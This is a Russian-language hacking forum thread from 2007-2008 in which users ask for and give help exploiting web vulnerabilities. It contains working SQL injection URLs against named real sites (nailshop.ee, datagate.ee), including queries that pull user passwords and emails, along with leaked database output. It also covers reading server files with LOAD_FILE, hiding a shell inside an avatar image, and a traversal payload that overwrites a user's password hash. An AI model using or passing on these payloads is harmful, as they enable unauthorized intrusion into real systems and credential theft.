Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    +and+substring(version(),1,1)=5
    +and+substring(version(),1,1)=4
    +and+substring(version(),1,1)=3

    Если четвёртая или третяя не стоит заморачиваться, ИМХО.
     
    1 person likes this.
  2. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    Ды посимвольным это уже вообще конечный вариант. думал, может есть ещё способы!? ладно, будем др*читься посимвольвно :)
     
  3. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Нашел на античате шелл спрятанный под картинку
    Есть система Slaed 3.5 и пару юзеров.
    Как можно загрузить шелл через загрузку аватар? Как выполнять команды в этом случае?
     
  4. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    "Как можно загрузить шелл через загрузку аватар?" - Аплоадом=) Если он в нужном расширении.
    "Как выполнять команды в этом случае?" - Уже по сути никак. Апачей таких не осталось почти. А способ с шеллом в картинке используется для локальных инклудов.
     
  5. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    там 5 версия) есть варианты решения?
     
  6. sharoff

    sharoff Member

    Joined:
    5 Aug 2007
    Messages:
    25
    Likes Received:
    6
    Reputations:
    0
    попробуй -42222 поставить, или убрать кавычку..
    вполне есть вариант что у твоего юзера mysql нету доступа к базе information_schema
     
  7. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    AFoST
    Ты уверен, что там именно 3 поля? Скинул бы ссылку, было б легче разобраться.Или хотя б ошибку опиши.
    Мне кажется, что для посимвольного перебора ещё слишком рано, но тем не менее, ответ на твой вопрос
    http://www.securitylab.ru/contest/212099.php
    И в information_schema ты рано полез ))
     
  8. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    к информейшн.схема доступ есть. ковычку убирать и ставить "-" пробовал. =(
     
  9. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    там на самом деле 32 поля. но писать их тут долго) а вот с ошибкой там хз че. короче 2 варианта. либо белый экран, либо пишет что страница не найдена и выдает несколько символов из какого-то хеша в левой части экрана =\
    ссылку пока не дам :p
     
  10. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    AFoST Если скуль слепая, то либо перебор с подзапросами, либо ищи дыру в других параметрах. А вообще , если хочешь , кинь линк в ПМ , посмотрю
     
    1 person likes this.
  11. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    такс) прошлую проблему решил. теперь столкнулся с другой. вывожу на экран через мускул файл LOAD_FILE('/etc/passwd/logs/access.log') всё прекрасно работает. выводятся все записи и тд. в логах нашёл раскрытие путей и вывожу файл допустим такой LOAD_FILE('/home/www/name/name.ru/bla-bla/header.php') на что мне выводится на экран лишь часть аписанного в файле, примерно следующего содержания:

    кусок кода страницы без скул-запроса:
    кусок кода страницы с скул-запросом:
    Кусок файла выводится на экран и всё...я так подозреваю, что ф-ция LOAD_FILE встречает какой-то символ и начинает некорректно обрабатывать содержимое файла...
    вопрос. как вывести всё содержимое файла?
     
  12. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    возможно в поле ограничено кол-во символов
    попробуй другие поля
    и вообще для чтения файлов юзай Sipt 4 имхо намного удобней
     
  13. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    ну я ж написал)
    Значит не в ограниченности дело...
    Sipt хм...скачаю посмотрю)
     
  14. zjuk@

    zjuk@ New Member

    Joined:
    4 Sep 2007
    Messages:
    13
    Likes Received:
    2
    Reputations:
    0
    народ, поможите
    _http://www.nailshop.ee/emall/detail.php?prodid=-1+order+by+5,2/*
    из запроса ясно, что таблиц всего 5.
    Но тут вылезает проблема ни к месту
    "The used SELECT statements have a different number of columns" при запросе:
    _http://www.nailshop.ee/emall/detail.php?prodid=-1+union+select+concat_ws(0x3a,database(),user(),version()),2,3,4,5/**/
    как такое может быть??? Вксь мозг поломал уже
     
  15. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    zjuk@
    http://www.nailshop.ee/emall/detail.php?prodid=1+and+1=2+union+select+1,2,3,concat_ws(0x3a,User(),Database(),Version()),5,6,7,8,9,0,1,2,3,4,5,6,7/*
    Вывод в коде :

    nailshop@localhost:nailshop_eMall:5.0.45-log
     
    3 people like this.
  16. zjuk@

    zjuk@ New Member

    Joined:
    4 Sep 2007
    Messages:
    13
    Likes Received:
    2
    Reputations:
    0
    пасибо
     
  17. zjuk@

    zjuk@ New Member

    Joined:
    4 Sep 2007
    Messages:
    13
    Likes Received:
    2
    Reputations:
    0
    доброго времени суток всем, подскажите, где подвох:
    _http://datagate.ee/index.php?ln=rus&mid=-1+order+by+7,2/**/
    из этого ясно, что полей 7, так как значения выше семи ругаются на несоответствие числа столбцов. Однако:
    _http://datagate.ee/index.php?ln=rus&mid=1+and+1=2+union+select+userid,2,user,useremail,userpassword,username,7+from+users/**/
    снова ругается на кол-во столбцов, в чём же дело??? объясните пожалуйста
     
  18. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    ну так правильно... тебе ж в прошлом посту написали что там 17 столбцов=)
     
    #3058 gisTy, 27 Aug 2008
    Last edited: 27 Aug 2008
  19. zjuk@

    zjuk@ New Member

    Joined:
    4 Sep 2007
    Messages:
    13
    Likes Received:
    2
    Reputations:
    0
    не, с тем сайтом (nailshop.ee) я разобрался уже, спасибо. А тут уже другой сайт (datagate.ee) и случай вроде совсем не похожий, подскажите как с ним быть
     
    #3059 zjuk@, 27 Aug 2008
    Last edited: 27 Aug 2008
  20. Fuckel

    Fuckel Banned

    Joined:
    16 Jan 2008
    Messages:
    274
    Likes Received:
    59
    Reputations:
    6
    проблемка с инъекцией:

    описание:
    нету выводимых полей (это не проблема)
    к тому же локальный "инклуд" средствами copy(), по запрсу видно, что ОС винда

    проблема заключается в объединение запросов sql, можно ли объеденить с запросом INTO OUTFILE ?

    Code:
    
    gallery.php?speichern=../../../../../../../../../../../../boot.ini', user_password='d41d8cd98f00b204e9800998ecf8427e' WHERE user_id=84 +--+
    
     
     
Thread Status:
Not open for further replies.